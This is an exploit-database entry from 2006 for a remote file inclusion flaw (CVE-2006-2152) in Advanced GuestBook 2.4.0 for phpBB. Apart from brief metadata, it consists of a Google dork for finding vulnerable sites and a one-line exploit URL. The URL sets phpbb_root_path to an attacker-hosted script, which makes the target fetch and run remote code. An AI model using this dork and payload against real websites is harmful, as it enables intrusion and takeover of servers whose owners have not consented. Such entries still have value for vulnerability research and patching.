Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability

  • EDB-ID: 1723
  • CVE: 2006-2152
  • OSVDB-ID: 25261
  • Author: [Oo]
  • Published: 2006-04-28
  • Verified: Verified
  • Exploit Code:   Download
  • Vulnerable App:    N/A
Next Exploit Previous Exploit Home 
Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Credits: [Oo]

Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?

# milw0rm.com [2006-04-28]